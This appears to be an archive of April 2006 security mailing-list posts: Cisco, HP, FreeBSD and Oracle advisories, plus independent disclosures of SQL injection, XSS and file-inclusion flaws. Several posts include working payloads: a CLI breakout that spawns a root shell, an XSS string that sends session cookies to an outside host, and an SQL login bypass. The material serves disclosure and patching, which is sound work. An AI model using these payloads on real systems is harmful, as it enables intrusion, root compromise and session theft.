list($referral_val) = $db->fetch_row($result);
$rval = $referral_val[0] + 1;
$db->query('UPDATE '.$db->prefix.'users SET referral_count='. 
$rval . ' WHERE id='.$  referral_id) or 
error(mysql_error(), __FILE__, __LINE__, $db->error());

Fix :-

$referral_id = intval($_COOKIE["forumreferrer"]);

//-// //-// 
//-// //-// 
//-// //-// 
//-// //-//

//-//  [ Bug 2 ] 

// File name :- message_list.php
// Bug :- Remote SQL Injection

/* Code

if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply']) 
if( isset($_POST['delete_messages_comply']) )
$db->query('DELETE FROM '.$db->prefix.'messages WHERE id 
IN('.$_POST['messages'].') AND owner=  
\''.$forum_user['id'].'\'') or error(mysql_error(), __FILE__, __LINE__, 
$lang_pms['Deleted redirect']);


// Fix :-

Replace with this code :D

if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply']) 
if( isset($_POST['delete_messages_comply']) )
$db->query('DELETE FROM '.$db->prefix.'messages WHERE id 
IN('.intval($_POST['messages']).') AND owner=  
\''.$forum_user['id'].'\'') or error(mysql_error(), __FILE__, __LINE__, 
$lang_pms['Deleted redirect']);

// Exploit

- Resend This Requsit By HTTPLiveHeaders :D -


Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread john
The XP DNS client has other problems as well.  It caches DNS failiures 
(arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into 
an internet network that has local domains which need to resolve to RFC1918 
addresses.  The cached failed lookups get prefered to forced entries in the 
hosts file, if that is tried as a way of forcing the dns lookups to work.  Very 
frustrating.  So, this isn't much of a surprise.  Rotten, yes, surprising, no.

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread robsekeris
After reading your scary message, went to verify your points and confirmed all. 
Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal 
Firewall is for free) on top of a router firewall, I've been able to block or 
force a request as I see fit for each of these sites. On WMP, untick the 
Automatic Coded update function for starters, but indeed its highly irritating 
that you have no control over auto update yes/no. As to the MS firewall, that's 
a joke. It only does partial incoming traffic control and NONE on outgoing! 
If you like blocking specific IP's or ranges use for instance Peerguardian 2. I 
find it stops truly anything you don't want to not to come thru.

The bypassing of the HOSTS file is something i thinks would fall under required 
disclosurechanging functionality of an intergral part to network control. 
Think this build in trickery will have interest of the EU commission too!

Shbablek Mail Vulnerablitiy - Cross-Site Scripting

2006-04-19 Thread n0m3rcy
# Shbablek Mail Vulnerablitiy - Cross-Site Scripting
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <[EMAIL PROTECTED]>
# Exploit:

i) in the Already have an account?
ia) Account name: alert(1)
ib) Password: alert(1)

# Shoutz:
cijfer , dag , devil-00 , q-ex and all my friends

# have phun!

redirection vuln crawlers breed & security through obscurity

2006-04-19 Thread Ivan Sergio Borgonovo
I just came across such kind of code (php) written by a colegue:

if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
header("Location: ./login.html");
//missing else to mitigate the problem!!
//HTML stuff here...

code structure of all the other "supposed to be" private pages is:

//wannabe protected code

Everything resides at something like:

of course the ONLY thing you've to do to break into the admin interface is:
- disable redirection in your preferred browser (w3m)
- guess the right address and
- point exactly to it: http://site/admin/index.php or any existing page[1] eg. 

http://site/admin/ won't work. I did some research to see if you could find a 
way to make "educated guess" by examining the flow of HTTP responses, but I 
didn't came out with any good idea. Nevertheless index.php doesn't seem to be a 
bad educated guess (as Default.asp, index.asp,, login.asp...).

Now some questions and a proposal:
- how safe is to rely on secrecy of the URL? I'm looking for a quantification 
of the risk, not a "it is a bad idea" ;)
 of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is safer than 
http://site/admin/index.php. Any already made study? numbers?
- are SE like google going to index such kind of pages if there is no 
"external" link[*]?
- are there already many specialized vuln crawlers looking for such kind of 

What about building crawlers that ignore redirection to scan for such kind of 
I think that kind of mistake should be pretty popular.

Did I reinvent the wheel?

[1] this makes educated guessing easier increasing the number of potential 
targets: manager.php, insert.php, delete.php and it makes this [in]security 
model rely just on the dir path... unless the programmer is so crazy to call 
all his files with random names. But coding the access credential in a path 
makes the code not that relocable... etc... etc..

[*] What I mean: it exists a chain of links that connect that page with a link 
on a homepage or an already indexed page.

BTW the colegue didn't set any association between .inc and the php 
interpreter. So you can even get the source with another maybe 
harder educated guess.

... and happy Easter holidays.

Ivan Sergio Borgonovo

Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup

2006-04-19 Thread Paul Wouters

On Sat, 15 Apr 2006, Thor (Hammer of God) wrote:

It's a simple method to bypass malicious host file modification.  Probably
in response to malware like MyDoom, which specifically altered the hosts
file to keep clients from accessing AV sites ( was also
specifically included in MyDoom as well.)

Sure. And instead of everyone whining about this, they should prepare
their DNSSEC setup so microsoft can secure their zone and can rely on
the resolver to use DNSSEC to prevent these types of malware traps.


Re: phpBB Admin command execution

2006-04-19 Thread dave . de
On which version of phpBB was this tested?

Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance

2006-04-19 Thread Cisco Systems Product Security Incident Response Team
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in the WLSE

Advisory ID: cisco-sa-20060419-wlse

Revision 1.0

For Public Release 2006 April 19 1500 UTC (GMT)

- -


Affected Products
Software Version and Fixes
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Revision History
Cisco Security Procedures

- -


There are two vulnerabilities that exist in the CiscoWorks Wireless
LAN Solution Engine (WLSE). The first is a cross site scripting (XSS)
vulnerability that may allow an attacker to gain administrative
privileges on the system. The second is a local privilege escalation
vulnerability that can be used by an attacker who already has
authenticated access to the command line interface to obtain access
to the underlying operating system.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is available at

Affected Products

Vulnerable Products

A CiscoWorks Wireless LAN Solution Engine (WLSE) or WLSE Express
running any version of software prior to 2.13 are vulnerable to both
of these vulnerabilities.

Several other Cisco products are affected only by the local privilege
escalation vulnerability, including Cisco Hosting Solution Engine
(HSE), User Registration Tool (URT), Cisco Ethernet Subscriber
Solution Engine (ESSE) and CiscoWorks2000 Service Management
Solution. A separate Cisco Security Response has been published
regarding the impact and the fixes on these products and can be found

Products Confirmed Not Vulnerable

No other Cisco products are affected by both of these


CiscoWorks WLSE is a centralized, systems-level application for
managing and controlling an entire autonomous Cisco WLAN

Two vulnerabilities exist in the WLSE appliance that may allow an
attacker to gain complete control of the device or to obtain access
to the underlying operating system.

These issues are documented by the following Cisco bug IDs:

  * CSCsc01095 (registered customers only) - Cross site scripting
vulnerability in WLSE appliance web interface
This fix addresses the cross site scripting (XSS) vulnerability
in the WLSE appliance web user interface. By exploiting this
vulnerability, an attacker may obtain the session cookie
information and further use this information to gain
administrative privileges on the system.
  * CSCsd21502 (registered customers only) - Privilege escalation to
Linux shell
This fix addresses the local privilege escalation from the
command line interface of the WLSE appliance. By exploiting this
vulnerability an attacker who already has authenticated access to
the command line interface may inject a command to obtain a shell
account on the underlying operating system.


By exploiting these vulnerabilities together, an attacker may obtain
complete control of the WLSE appliance.

Software Version and Fixes

When considering software upgrades, also consult and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

These vulnerabilities are fixed in the 2.13 version of WLSE software.
Fixed software can be downloaded from the following URL:


There are no workarounds for these vulnerabilities.

Obtaining Fixed Software

Cisco will make free software available to address this vulnerability
for affected customers. This advisory will be updated as fixed
software becomes available. Prior to deploying software, customers
should consult their maintenance provider or check the software for
feature set compatibility and known issues specific to their

Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree t

ThWboard <= 3 Beta 2.84 SQL Injection

2006-04-19 Thread Qex
Discovered by: Qex 
Date: 19 April 2006 


RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities

2006-04-19 Thread info

- GroundZero Security Research and Software Development 2006

-  Security Advisory regarding RechnungsZentrale v2.
-  SQL Injection and Remote File inclusion Vulnerabilities. 
-  Released: Tue Apr 18 18:00:00 CEST 2006  


- Affected: 


Software:   RechnungsZentrale V2
Version:1.1.3, likely older versions are affected aswell.

- Information:  


"RechnungsZentrale V2 is a multiuser, Web-based billing application. 
 It facilitates the creation of bills and the management of customers. 
 It is written in PHP and uses MySQL. It supports German, English, French, 
 and Dansk languages."

The Software contains vulnerabilities which allow an Attacker to conduct
SQL injection and Remote File inclusion Attacks prior to Authentication.

The SQL injection vulnerabilitie exists in the login script (authent.php4) 
allows an Attacker to log into the internal Interface or execute malicious 
SQL commands.

User: ' OR '1'='1
Password: 1

In the same script it is possible to include a remote php by pointing the 
"rootpath=" option to a remote PHP script with a system() or passthru() 
Doing so would allow an unauthenticated Attacker to execute shell commands 
permissions of the Web Server. 



- Vendor Response:  


Notified:   Tue Apr 18 16:12:14 CEST 2006
Response:   Tue Apr 18 17:13:14 CEST 2006 
(Development Discontinued)
Disclosure: Tue Apr 18 18:00:00 CEST 2006

- Bugs discovered by GroundZero Security Research and Software Development  
- | Http://   


Multiple vulnerabilities in Linux based Cisco products

2006-04-19 Thread - Vulnerability Advisory
Release Date:

 Cisco Wireless Lan Solution Engine (WLSE)
 Cisco Hosting Solution Engine (HSE)
 Cisco Ethernet Subscriber Solution Engine (ESSE) 
 Cisco User Registration Tool (URT)
 CiscoWorks2000 Service Management Solution (SMS) 
 Cisco Vlan Policy Server (VPS)
 Cisco Management Engine (ME1100 Series)
 CiscoWorks Service Level Manager (SLM)

Vulnerabilities discovered:

 (1) A Vulnerability in the CiscoWorks WLSE "show" CLI application allows
 execution of arbitrary code as the root user. 

 (2) Cross-site scripting flaw allows session theft

Vulnerability impact of each:

 (1) Medium - An authenticated user can gain root access to the Linux based 

 (2) Low - A targeted attack could lead to session theft and administrator

Vulnerability information

 (1) The Cisco shell presents the administrator with a restricted set of 
 commands which includes a "show" application. The "show" application has
 several vulnerabilities which allow an attacker to "break out" of the 
 shell and execute commands (including /bin/sh) as the root user.

 This "show" application has been in use on this Linux-based platform 
 build since 1999 and exists on several other Linux-based Cisco products.

  An Administrator is logged into the Cisco WLSE via either Telnet or SSH.

  [EMAIL PROTECTED]: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp ([EMAIL PROTECTED]) (gcc version 2.96 2731
   (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   Intel(R) CPU at  3065.897 Mhz with 3105924K bytes of memory.

  [EMAIL PROTECTED]: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

  At this point the administrator has root level access to the Linux-based
  Cisco device.

 (2) A cross-site scripting flaw exists in:
with the "displayMsg" parameter. This can be used to steal the JSP session
cookie, therefore giving a targeted attacker admin level access to the 
system.  Once the attacker has admin web GUI access to the system via the 
XSS, they can then change the admin password or create a new admin user 
(without requiring the admin password).

The attacker can then use the aforementioned "show cli" local root 
vulnerability to gain complete control of the Cisco Linux-Based system.

As with (1) above Telnet or SSH access is required to login with the 
newly created user with admin level access in order to exploit the 
"show cli" bug.

  Example: \
   archiveApplyDisplay.jsp?displayMsg=document.location='http:// \'+document.cookie
  The cookie posted to includes the JSESSIONID token:; browser_tzoffset=-660; \
   JSESSIONID=johjehk2h1; \

  When combined with vulnerability (1), it allows a targeted attacker to gain
  root access to the linux system.  

 Cisco has released patches for the vulnerabilities.

References: advisory

 Cisco advisory note:
 Cisco security response:

 Adam Pointon of

Disclosure timeline:
 30-Dec-2005 - Discovered during configuration for a customer
 29-Jan-2006 - Email sent to psirt[at] with full technical details
 31-Jan-2006 - Response received from Cisco psirt
 01-Feb-2006 - Cisco advises bug reports have been opened for both issues
 05-Apr-2006 - Cisco releases patches to for testing
 19-Apr-2006 - Advisory released

About us: is a specialised information security consultancy. 
Our mission is to help organisations identify and secure information 
assets. Our expertise concentrates in security architecture, managed 
security and professional services in security testing/review and 

Supporting this approach are services in the following areas: 

* Compliance Services - Penetration testing, security reviews, 
compliance and audit services 

* Wireless and mobility solutions - design, installation and 
management of IEEE 802.11a/b/g (WiFi), tele-mobility and other 
wireless solutions 

* UNIX-like systems, netw

[security bulletin] HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote Execution of Arbitrary Code

2006-04-19 Thread security-alert
Hash: SHA1


Document ID: c00629555
Version: 7

HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-04-17
Last Updated: 2006-04-18

Potential Security Impact: Remote Execution of Arbitrary Code

Source: Hewlett-Packard Company,
HP Software Security Response Team

A vulnerability has been identified in Sendmail which may allow a
remote attacker to execute arbitrary code.

References: CVE-2006-0058

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.11, B.11.23.


CERT has published a vulnerability report available at:

This bulletin will be revised as other versions of Sendmail become

To determine if an HP-UX system has an affected version,
search the output of "swlist -a revision -l fileset"
for one of the filesets listed below. For affected systems
verify that the recommended action has been taken.


For sendmail 8.13.3
HP-UX B.11.23
action: install revision B. or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/

HP-UX B.11.11
action: install revision B. or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/

For sendmail 8.11.1
HP-UX B.11.23
action: install UNOF_INET31734_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/

 ->HP-UX B.11.11
 ->action: remove SMAIL-811 and migrate to SMAIL-UPGRADE
URL: ftp://sendmail:[EMAIL PROTECTED]/

HP-UX B.11.00
action: install revision B. or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/

For sendmail 8.9.3 and previous
HP-UX B.11.11
action: install UNOF_INET_29774_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/

HP-UX B.11.00
action: install UNOF_INET29773_1.depot or subsequent
URL: ftp://sendmail:[EMAIL PROTECTED]/



HP has made the following software updates available to resolve
the issue.
Installations running sendmail 8.8.6 should upgrade to sendmail
8.9.3 or 8.11.1 from the patch/upgrade software listed in this
Installations running sendmail 8.11.1 on HPUX 11.11 should upgrade
to sendmail 8.13.3 from the upgrade software listed in this

The software updates can be downloaded via ftp from:

System: (
Login: sendmail
Password: sendmail (NOTE: CASE-sensitive)

ftp://sendmail:[EMAIL PROTECTED]/
ftp://sendmail:[EMAIL PROTECTED]/

The README.txt.pgp there contains cksum and md5 output for the
preliminary depots.

For sendmail 8.13.3, HP-UX B.11.23
cksum 692720776 15759360
md5 E09933A4AECC16B97A8F7ACF07060F84

For sendmail 8.13.3, HP-UX B.11.11
cksum 954959898 5130240
md5 C85EFD8AEDB16EEF1DF0FF65988350C0

For sendmail 8.11.1, HP-UX B.11.23
cksum 3327957574 3317760
md5 B17A7F5566214B35E983B3F53C309A17

cksum 2096860596 7487
md5 565F7963B77BEE3EB2825990F60D1F6D

 ->For sendmail 8.11.1, HP-UX B.11.11
 ->cksum 3968008060 2938880
 ->md5 91a050b976b522a27558e92673fca591

For sendmail 8.11.1, HP-UX B.11.00
cksum 4072259977 2846720
md5 847aa9f1a154da9b07afc26d91fbaba6

cksum 2379624538 36262
md5 cac0d95747af260f40dac7cc943f6353

For sendmail 8.9.3 and previous, HP-UX B.11.11
cksum 3708819014 890880
md5 8580A701FC19A49703C852440DBD25FA

For sendmail 8.9.3 and previous, HP-UX B.11.00
cksum 2797348841 1372160
md5 2b33f65a2c81894849a5a6eb7d67650f

cksum 2797348841 1372160
md5 67acbcff161b71930365b3b77788fbde

After installation, verify output of what /usr/sbin/sendmail.

To check if installations are running sendmail 8.8.6 execute
"what /usr/sbin/sendmail"
and check the version string.

 ->Upgrading sendmail 8.8.6 / 8.9.3 to 8.11.1 or 8.13.3 is done
 ->using the depots mentioned in this bulletin.

 ->Sendmail-811 for HP-UX B.11.11
 ->In lieu of installing the upgrade SMAIL-811 consider upgrading
 ->to sendmail 8.13.3 available in SMAIL-UPGRADE.
 ->If servers are running sendmail 8.11.1 and can not be upgdraded
 ->to 8.13.3 a solution is available by contacting your support

HP-UX B.11.00 - install preliminary software update

Re: [KAPDA::#41] - Mambo/Joomla rss component vulnerability

2006-04-19 Thread rey . gigataras
This issue was addressed in the Joomla! 1.0.8 release:,55808.msg298644.html#msg298644

Rey Gigataras
Joomla! Core Developer
Stability Team Leader

Re: Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000

2006-04-19 Thread office
These issues were brought to my attention, and I have patched the page= issue.

I welcome any other friendly prodding of my system. Please notify me if you 
find more vulnerabilities.

Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities

2006-04-19 Thread Cisco Systems Product Security Incident Response Team
Hash: SHA1

Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities

Advisory ID: cisco-sa-20060419-xr

Revision 1.0

For Public Release 2006 April 19 1500 UTC (GMT)

- -


Affected Products
Software Version and Fixes
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Revision History
Cisco Security Procedures

- -


Multiple Multi Protocol Label Switching (MPLS) related
vulnerabilities exist on Cisco IOS  XR. Only systems that are running
Cisco IOS XR and configured for MPLS are affected by these

Upon successful exploitation a Modular Services Card (MSC) on a Cisco
Carrier Routing System 1 (CRS-1) or a Line Card (LC) on a Cisco 12000
series router may reload affecting switched traffic.

Cisco has made free software available to address this vulnerability
for affected customers.

This advisory is posted at

Affected Products

Vulnerable Products

Only systems that are running Cisco IOS XR and configured for MPLS
are affected by this vulnerability.

Systems that are running Cisco IOS XR and configured for MPLS can be
identified by the show mpls interfaces command. A sample output of
this command on a CRS-1 that is configured for MPLS is given below.

  RP/0/RP1/CPU0:crs1#show mpls interfaces
  Interface  LDP  Tunnel   Enabled
  POS0/2/0/0 Yes  Yes  Yes
  POS0/2/0/1 No   Yes  Yes
  POS0/2/0/2 Yes  No   Yes
  POS0/2/0/3 Yes  Yes  Yes
  GigabitEthernet0/3/1/0 Yes  No   Yes
  GigabitEthernet0/3/1/3 Yes  No   Yes
  POS0/3/0/1 Yes  Yes  Yes
  TenGigE0/6/0/0 Yes  No   Yes

In the above output, the fourth column labeled Enabled identifies
MPLS enabled interfaces.

Products Confirmed Not Vulnerable

Cisco IOS XR only runs on CRS-1 or Cisco 12000 series routers. Other
Cisco products, including systems that run Cisco IOS are not


Cisco IOS XR Software is a member of the Cisco IOS Software Family
that uses a microkernel based distributed operating system
infrastructure. Cisco IOS XR runs both on Cisco CRS-1 and Cisco 12000
series routers.

More information on Cisco IOS XR can be found at the following URL:

Modular Services Cards (MSC), also called the line cards are Layer-3
forwarding engines on Cisco CRS-1. An MSC is paired with a physical
layer interface module (PLIM) which provides layer-1 and layer-2

More information on Cisco CRS-1 architecture can be found at the
following URL:

Specific MPLS packets that are switched by a Cisco CRS-1 or a 12000
series system will restart the NetIO process. If the NetIO process is
restarted several times consecutively, the line card will reload
causing a Denial of Service (DoS) condition for the traffic that is
being switched on that line card.

MPLS packets will be forwarded through the MPLS network. Therefore,
packets that can trigger this vulnerability can be sent from remote
systems that are in the MPLS network. Such packets can not be
received on interfaces that are not configured for MPLS.

This vulnerability is addressed by the following Cisco bug IDs:

  * CSCsd15970 -- MSC crash upon receipt of specific MPLS packets
This bug only affects CRS-1 and does not affect Cisco 12000
series routers that are running Cisco IOS XR.

  * CSCsd55531 -- MPLS packet handling problems
This bug only affects CRS-1 and does not affect Cisco 12000
series routers that are running Cisco IOS XR.

  * CSCsc77475 -- Line card crash upon receipt of specific MPLS
This bug affects both CRS-1 and Cisco 12000 series routers that
are running Cisco IOS XR.


Successful exploitation of the vulnerability may result in a reload
of the Modular Services Card (MSC) on a CRS-1 or the line cards on a
Cisco 12000 series router. Repeated exploitation could result in a
sustained DoS attack.

Software Version and Fixes

When considering software upgrades, also consult and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to

XSS Vulnerability in Guest-book script powered by Community Architect

2006-04-19 Thread susam . pal
[This document is best seen with Font: Verdana Size: 9pt]

Advisory Name
XSS Vulnerability in Guest-book script powered by Community Architect

Vulnerable Systems
Sites providing web-hosting service powered by Community Architect.

Found By
Susam Pal

Found On
4th April, 2006

Vulnerability Type
Cross Site Scripting (XSS)

Action Taken
Reported to ( is one of the sites powered by Community Architect)

=== fixed the vulnerability on 10th April, 2006

System Description
Many web-hosting sites powered by Community Architect offer free as well as 
paid services to those who want to host a website on their servers. They offer 
customized Guest-book input form page 
(, Guest-book page 
( along with ready-made script 
( to the web-designer designing a 
website on their servers.

A person visiting the website signs the guest-book by filling up the form in On submission, the inputs are 
submitted to the script, on the 
server. The script processes the input and updates the page, to reflect the new message 
submitted by the user.

Vulnerability Description
The script,, is vulnerable to XSS 
since it doesn't validate the input for the presence of HTML tags. As a result 
HTML tags & JavaScript codes entered as input in the form of become a part of the HTML code of and hence it is executed by the 
browser when any user visits the page.

It provides the attacker an opportunity to inject HTML formatting elements to 
tamper with the display of the page or inject JavaScript code to trouble the 
user visiting this page.

Contact Information
For more information, please contact:-

Susam Pal,
Infosys Technologies Ltd.
Survey No. 210, Manikonda Village
Lingampally, Rangareddy District
Hyderabad, PIN 500019
Phone No.: +91-99859521


Oracle 10g DBA exploit

2006-04-19 Thread putosoft softputo

* Fucking NON-0 day($) exploit for Oracle 10g
* Patch your database now!
* by N1V1Hd $3c41r3

 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)


 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)

  pragma autonomous_transaction;


 v_Return VARCHAR2(200);
 VERSION := '';  GMFLAGS := 1;



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increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis.

[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability

2006-04-19 Thread admin
[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability 
Software: ActualAnalyzer
Type: Remote File Include Vulnerability
Date: April, 19th 2006
Vendor: ActualScripts
Risc: High


Discovered by: 'Aesthetico'

Affected Products:

ActualAnalyzer Lite 2.72   and prior
ActualAnalyzer Gold 7.63   and prior
ActualAnalyzer Server 8.23 and prior


ActualAnalyzer is a powerful statistics-gathering and analysis tool for 
monitoring web site traffic. 
It is equally effective for sites with low and high volumes of traffic 
and provides a wealth of comparative and analytical information.
High performance is achieved by using a MySQL database. 


register_globals = On


Input passed to the "rf" parameter in "direct.php" is not
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external resources.


Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".


Post data:

FreeBSD Security Advisory FreeBSD-SA-06:14.fpu

2006-04-19 Thread FreeBSD Security Advisories
Hash: SHA1

FreeBSD-SA-06:14.fpuSecurity Advisory
  The FreeBSD Project

Topic:  FPU information disclosure

Category:   core
Module: sys
Announced:  2006-04-19
Credits:Jan Beulich
Affects:All FreeBSD/i386 and FreeBSD/amd64 releases.
Corrected:  2006-04-19 07:00:35 UTC (RELENG_6, 6.1-STABLE)
2006-04-19 07:00:50 UTC (RELENG_6_1, 6.1-RELEASE)
2006-04-19 07:01:12 UTC (RELENG_6_0, 6.0-RELEASE-p7)
2006-04-19 07:01:30 UTC (RELENG_5, 5.5-STABLE)
2006-04-19 07:01:53 UTC (RELENG_5_4, 5.4-RELEASE-p14)
2006-04-19 07:02:23 UTC (RELENG_5_3, 5.3-RELEASE-p29)
2006-04-19 07:02:43 UTC (RELENG_4, 4.11-STABLE)
2006-04-19 07:03:01 UTC (RELENG_4_11, 4.11-RELEASE-p17)
2006-04-19 07:03:14 UTC (RELENG_4_10, 4.10-RELEASE-p23)
CVE Name:   CVE-2006-1056

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit>.

I.   Background

The floating-point unit (FPU) of i386 and amd64 processors is derived from
the original 8087 floating-point co-processor.  As a result, the FPU
contains the same debugging registers FOP, FIP, and FDP which store the
opcode, instruction address, and data address of the instruction most
recently executed by the FPU.

On processors implementing the "SSE" instruction set, a new pair of
instructions fxsave/fxrstor replaces the earlier fsave/frstor pair used
for saving and restoring the FPU state.  These new instructions also
save and restore the contents of the additional registers used by SSE

II.  Problem Description

On "7th generation" and "8th generation" processors manufactured by AMD,
including the AMD Athlon, Duron, Athlon MP, Athlon XP, Athlon64, Athlon64
FX, Opteron, Turion, and Sempron, the fxsave and fxrstor instructions do
not save and restore the FOP, FIP, and FDP registers unless the exception
summary bit (ES) in the x87 status word is set to 1, indicating that an
unmasked x87 exception has occurred.

This behaviour is consistent with documentation provided by AMD, but is
different from processors from other vendors, which save and restore the
FOP, FIP, and FDP registers regardless of the value of the ES bit.  As a
result of this discrepancy remaining unnoticed until now, the FreeBSD
kernel does not restore the contents of the FOP, FIP, and FDP registers
between context switches.

III. Impact

On affected processors, a local attacker can monitor the execution path
of a process which uses floating-point operations.  This may allow an
attacker to steal cryptographic keys or other sensitive information.

IV.  Workaround

No workaround is available, but systems which do not use AMD Athlon, Duron,
Athlon MP, Athlon XP, Athlon64, Athlon64 FX, Opteron, Turion, or Sempron
processors are not vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 4-STABLE, 5-STABLE, or 6-STABLE,
or to the RELENG_6_0, RELENG_5_4, RELENG_5_3, RELENG_4_11, or
RELENG_4_10 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 4.10,
4.11, 5.3, 5.4, and 6.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 4.x]
# fetch
# fetch

[FreeBSD 5.x and 6.x]
# fetch
# fetch

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in> and reboot the

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch   Revision
- -

SQL Injection in package SYS.DBMS_LOGMNR_SESSION

2006-04-19 Thread ak
SQL Injection in package SYS.DBMS_LOGMNR_SESSION

NameSQL Injection in package SYS.DBMS_LOGMNR_SESSION
Systems AffectedOracle Database
SeverityMedium Risk
CategorySQL Injection (DB06)
Vendor URL
Author  Alexander Kornbrust (ak at
Advisory18 April 2006 (V 1.00)
Oracle Bugid6980723

The package SYS.DBMS_LOGMNR_SESSION contains a SQL injection vulnerability in 
the procedure DELETE_FROM_TABLE.
Oracle fixed this problem by using the package DBMS_ASSERT.

This advisory

Patch Information
Apply the patches for Oracle CPU April 2006 on top of Oracle 9i Release 2 or 
Oracle 10g Release 1.
The patches are available via Oracle Metalink.

01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
18-apr-2006 Oracle published CPU April 2006
18-apr-2006 Advisory published

Additional information
An analysis of the Oracle CPU April 2006 is available here

Many (40+) open security issues in Oracle are still unfixed

CuteNews 1.4.1 <= Cross Site Scripting

2006-04-19 Thread sn4k3 . 23
// CuteNews 1.4.1 <= Cross Site Scripting //


[~] Advisory by: LoK-Crew ~ Snake_23

[-] Exploit:[XSS]

[-] Googledork: Powered by CuteNews 1.4.1 

[+] Greetz to: PHCN
[+] Visit: